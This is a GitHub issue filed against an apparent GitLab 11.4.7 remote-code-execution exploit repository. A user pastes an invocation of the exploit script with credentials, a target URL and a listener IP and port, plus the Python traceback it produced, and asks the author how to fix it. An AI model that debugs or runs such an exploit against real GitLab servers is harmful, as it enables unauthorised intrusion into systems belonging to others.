GitLab-11.4.7-RCE icon indicating copy to clipboard operation
GitLab-11.4.7-RCE copied to clipboard

AttributeError: 'NoneType' object has no attribute 'get'

Open qq10420946 opened this issue 1 year ago • 1 comments

Dear author, I got an error when using it.

[root@www wwwroot]# python3 1.py -u jiehou -p Aa123456 -g "http://10.10.10.1" -l 192.168.0.1 -P 7777 [+] authenticity_token: pnI5HqNUSxQxsmH4IyDX8g+S+YumbeZhrkE3GeRs2NXK1XqD1CAZc6EVWMO4P6ZkKrJSd75NeO4/nE1SWdf+Og== [+] Creating project with random name: project8247 Traceback (most recent call last): File "1.py", line 67, in 'input', {'name': 'project[namespace_id]'}).get('value') AttributeError: 'NoneType' object has no attribute 'get'

How should this be solved?

qq10420946 avatar May 23 '24 20:05 qq10420946